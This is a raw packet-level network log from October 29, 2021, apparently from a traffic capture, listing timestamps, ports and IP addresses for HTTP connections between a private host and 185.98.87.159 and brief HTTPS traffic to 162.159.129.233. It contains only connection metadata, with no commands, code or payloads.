Oct 29, 2021 20:50:11.163537025 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.163554907 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.163667917 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.163686037 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.163702011 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.163731098 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.164156914 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.164175987 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.164194107 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.164210081 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.164220095 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.164237022 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.164730072 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.164747953 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.164766073 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.164778948 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.164782047 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.164802074 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.165141106 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.166203022 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.172482014 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.172504902 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.172519922 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.172538042 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.172552109 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.172557116 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.172580957 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.204117060 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204155922 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204178095 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204200029 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204220057 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204242945 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204251051 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.204265118 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204276085 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.204286098 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204307079 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204325914 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.204328060 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204349041 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204353094 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.204385996 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.204457998 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204535961 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204560995 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204577923 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.204581022 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204598904 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204616070 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204632998 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.204637051 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204658031 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.204874039 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.204916954 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.204946041 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.205414057 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.205435991 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.205456972 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.205463886 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.205476999 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.205503941 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.205580950 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.205601931 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.205641031 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.205919027 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.205941916 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.205967903 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.206129074 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.206151962 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.206192017 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.206337929 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.206358910 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.206382036 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.206401110 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.206402063 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.206413984 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.214111090 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.214235067 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.245640039 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.245702982 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.245744944 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.245785952 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.245816946 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.245845079 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.245860100 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.245873928 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.245901108 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.245939016 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.245953083 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.245980024 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.245981932 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.246018887 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246056080 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246062994 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.246094942 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246134043 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246138096 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.246169090 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246211052 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246248007 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246253967 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.246287107 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246325970 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246336937 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.246355057 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246366978 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.246393919 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246432066 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246462107 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246475935 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.246500969 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.246503115 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246541023 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246579885 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246587038 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.246603012 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.246619940 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246649981 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246689081 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246689081 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.246726990 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.246773005 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.249191046 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.249237061 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.249274969 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.249315023 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.249346972 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.249353886 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.249362946 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.249392033 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.249411106 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.249432087 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.249470949 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.249507904 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.249522924 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.249550104 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.293389082 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.293461084 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.293569088 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.293740988 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.293782949 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.293823004 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.293839931 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.293863058 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.293901920 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.293908119 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.293941021 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.293981075 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294022083 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294049978 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.294060946 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294081926 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.294099092 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294137955 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294176102 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294188023 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.294214010 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294220924 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.294253111 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294292927 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294325113 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294354916 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.294363022 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294378042 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.294399977 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294454098 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294491053 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294506073 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.294527054 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294548035 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.294564009 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294600010 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294636011 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294646978 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.294672012 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294698000 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294734001 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294769049 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294804096 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294840097 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294861078 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.294873953 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294897079 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.294909000 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294945002 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294980049 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.294996977 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.295008898 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.295032024 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.343389034 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343446970 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343487978 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343524933 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343558073 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.343564987 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343591928 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.343602896 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343621969 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.343643904 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343682051 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343720913 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343745947 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.343759060 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343781948 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.343799114 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343837023 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343875885 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343887091 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.343914032 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.343929052 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.343952894 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344008923 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.344016075 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344053984 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344093084 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344104052 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.344130993 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344168901 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344208002 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344218969 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.344245911 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344252110 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.344285011 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344325066 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344363928 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344374895 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.344403028 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344413996 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.344440937 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344477892 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344491005 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.344515085 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344553947 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344561100 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.344593048 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344633102 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344644070 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.344669104 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344707012 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344722986 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.344744921 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344784021 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344814062 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.344824076 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344896078 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.344991922 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.390274048 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390320063 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390347958 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390376091 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390407085 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390427113 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.390433073 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390455961 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.390460014 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390495062 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390503883 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.390571117 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390697002 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390758991 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.390764952 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390795946 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390824080 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390840054 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.390851021 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390863895 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.390877962 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390908957 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390918016 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.390935898 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.390984058 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.391010046 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391038895 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391066074 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391087055 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.391094923 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391122103 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391135931 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.391151905 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391177893 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391196012 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.391204119 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391230106 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391247988 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.391258001 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391287088 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391304970 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.391310930 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391336918 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391361952 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.391366959 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391392946 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391417980 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.391418934 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391448021 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391475916 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391499043 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.391505957 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391531944 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.391532898 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391561031 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391570091 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.391591072 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.391635895 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.431020021 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431058884 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431081057 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431102991 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431123972 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431145906 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431149960 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.431169033 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431190014 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431194067 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.431210995 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431231022 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.431233883 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431255102 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431258917 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.431276083 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.431284904 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.431339025 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.431590080 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.482748032 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:12.665637016 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:12.665679932 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:12.665939093 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:12.919153929 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:12.919200897 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:12.960530996 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:12.960681915 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:12.963888884 CEST	49841	443	192.168.2.4	162.159.129.233
